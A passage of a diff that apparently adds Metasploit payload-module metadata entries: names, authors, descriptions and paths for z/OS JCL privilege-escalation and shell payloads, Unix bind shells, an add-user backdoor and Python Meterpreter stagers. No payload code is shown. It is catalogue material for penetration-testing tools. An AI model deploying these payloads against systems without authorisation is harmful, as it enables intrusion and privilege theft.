"adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", + "staged": false + }, + "payload_cmd/mainframe/apf_privesc_jcl": { + "name": "JCL to Escalate Privileges", + "fullname": "payload/cmd/mainframe/apf_privesc_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls", + "Ayoub" + ], + "description": "Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": 21, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/apf_privesc_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/mainframe/bind_shell_jcl": { + "name": "Z/OS (MVS) Command Shell, Bind TCP", + "fullname": "payload/cmd/mainframe/bind_shell_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Provide JCL which creates a bind shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/bind_shell_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/mainframe/generic_jcl": { + "name": "Generic JCL Test for Mainframe Exploits", + "fullname": "payload/cmd/mainframe/generic_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Provide JCL which can be used to submit\n a job to JES2 on z/OS which will exit and return 0. This\n can be used as a template for other JCL based payloads", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/generic_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/mainframe/reverse_shell_jcl": { + "name": "Z/OS (MVS) Command Shell, Reverse TCP", + "fullname": "payload/cmd/mainframe/reverse_shell_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Provide JCL which creates a reverse shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/reverse_shell_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/adduser": { + "name": "Add user with useradd", + "fullname": "payload/cmd/unix/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Nick Cottrell " + ], + "description": "Creates a new user. By default the new user is set with sudo\n but other options exist to make the new user automatically\n root but this is not automatically set since the new user will\n be treated as root (and login may be difficult). The new user\n can also be set as just a standard user if desired.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-01 12:30:26 +0000", + "path": "/modules/payloads/singles/cmd/unix/adduser.rb", + "is_install_path": true, + "ref_name": "cmd/unix/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_awk": { + "name": "Unix Command Shell, Bind TCP (via AWK)", + "fullname": "payload/cmd/unix/bind_awk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "espreto ", + "Ulisses Castro " + ], + "description": "Listen for a connection and spawn a command shell via GNU AWK", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_awk.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_awk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_aws_instance_connect": { + "name": "Unix SSH Shell, Bind Instance Connect (via AWS API)", + "fullname": "payload/cmd/unix/bind_aws_instance_connect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an SSH shell using AWS Instance Connect", + "references": [ + "URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel" + ], + "platform": "Unix", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_aws_instance_connect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_busybox_telnetd": { + "name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)", + "fullname": "payload/cmd/unix/bind_busybox_telnetd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matthew Kienow " + ], + "description": "Listen for a connection and spawn a command shell via BusyBox telnetd", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_busybox_telnetd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_inetd": { + "name": "Unix Command Shell, Bind TCP (inetd)", + "fullname": "payload/cmd/unix/bind_inetd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell (persistent)", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_inetd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_jjs": { + "name": "Unix Command Shell, Bind TCP (via jjs)", + "fullname": "payload/cmd/unix/bind_jjs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "conerpirate", + "bcoles " + ], + "description": "Listen for a connection and spawn a command shell via jjs", + "references": [ + "URL-https://gtfobins.github.io/gtfobins/jjs/", + "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", + "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" + ], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_jjs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_lua": { + "name": "Unix Command Shell, Bind TCP (via Lua)", + "fullname": "payload/cmd/unix/bind_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Listen for a connection and spawn a command shell via Lua", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_netcat": { + "name": "Unix Command Shell, Bind TCP (via netcat)", + "fullname": "payload/cmd/unix/bind_netcat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "m-1-k-3", + "egypt ", + "juan vazquez " + ], + "description": "Listen for a connection and spawn a command shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_netcat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_netcat_gaping": { + "name": "Unix Command Shell, Bind TCP (via netcat -e)", + "fullname": "payload/cmd/unix/bind_netcat_gaping", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_netcat_gaping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_netcat_gaping_ipv6": { + "name": "Unix Command Shell, Bind TCP (via netcat -e) IPv6", + "fullname": "payload/cmd/unix/bind_netcat_gaping_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_netcat_gaping_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_nodejs": { + "name": "Unix Command Shell, Bind TCP (via nodejs)", + "fullname": "payload/cmd/unix/bind_nodejs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Continually listen for a connection and spawn a command shell via nodejs", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_nodejs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_perl": { + "name": "Unix Command Shell, Bind TCP (via Perl)", + "fullname": "payload/cmd/unix/bind_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_perl_ipv6": { + "name": "Unix Command Shell, Bind TCP (via perl) IPv6", + "fullname": "payload/cmd/unix/bind_perl_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz " + ], + "description": "Listen for a connection and spawn a command shell via perl", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_perl_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_r": { + "name": "Unix Command Shell, Bind TCP (via R)", + "fullname": "payload/cmd/unix/bind_r", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Continually listen for a connection and spawn a command shell via R", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_r.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_r", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_ruby": { + "name": "Unix Command Shell, Bind TCP (via Ruby)", + "fullname": "payload/cmd/unix/bind_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_ruby_ipv6": { + "name": "Unix Command Shell, Bind TCP (via Ruby) IPv6", + "fullname": "payload/cmd/unix/bind_ruby_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_ruby_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_socat_sctp": { + "name": "Unix Command Shell, Bind SCTP (via socat)", + "fullname": "payload/cmd/unix/bind_socat_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-04-27 16:21:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_socat_sctp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_socat_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_socat_udp": { + "name": "Unix Command Shell, Bind UDP (via socat)", + "fullname": "payload/cmd/unix/bind_socat_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_socat_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_stub": { + "name": "Unix Command Shell, Bind TCP (stub)", + "fullname": "payload/cmd/unix/bind_stub", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell (stub only, no payload)", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_stub.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_stub", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_zsh": { + "name": "Unix Command Shell, Bind TCP (via Zsh)", + "fullname": "payload/cmd/unix/bind_zsh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Doug Prostko ", + "Wang Yihang " + ], + "description": "Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\n often available, please be aware it isn't usually installed by default.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_zsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/generic": { + "name": "Unix Command, Generic Command Execution", + "fullname": "payload/cmd/unix/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Executes the supplied command", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/generic.rb", + "is_install_path": true, + "ref_name": "cmd/unix/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/interact": { + "name": "Unix Command, Interact with Established Connection", + "fullname": "payload/cmd/unix/interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Interacts with a shell on an established socket connection", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/interact.rb", + "is_install_path": true, + "ref_name": "cmd/unix/interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/pingback_bind": { + "name": "Unix Command Shell, Pingback Bind TCP (via netcat)", + "fullname": "payload/cmd/unix/pingback_bind", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Accept a connection, send a UUID, then exit", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb", + "is_install_path": true, + "ref_name": "cmd/unix/pingback_bind", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/pingback_reverse": { + "name": "Unix Command Shell, Pingback Reverse TCP (via netcat)", + "fullname": "payload/cmd/unix/pingback_reverse", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Creates a socket, send a UUID, then exit", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb", + "is_install_path": true, + "ref_name": "cmd/unix/pingback_reverse", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/python/exec": { + "name": "Python Exec, Python Execute Command", + "fullname": "payload/cmd/unix/python/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/exec", + "staged": false + }, + "payload_cmd/unix/python/meterpreter/bind_tcp": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", + "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp" + }, + "payload_cmd/unix/python/meterpreter/bind_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/unix/python/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp_uuid" + }, + "payload_cmd/unix/python/meterpreter/reverse_http": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_http", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_http" + }, + "payload_cmd/unix/python/meterpreter/reverse_https": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_https", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_https" + }, + "payload_cmd/unix/python/meterpreter/reverse_tcp": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp" + }, + "payload_cmd/unix/python/meterpreter/reverse_tcp_ssl": { + "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", + "fullname": "payload/cmd/unix/python/meterpreter/reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Campbell ", + "RageLtMan" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/adapters/cmd/unix/python.rb", + "is_install_path": true, + "ref_name": "cmd/unix/python/meterpreter/reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/unix/python", + "adapted_refname": "python/meterpreter/reverse_tcp_ssl", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/reverse_tcp_ssl" + }, + 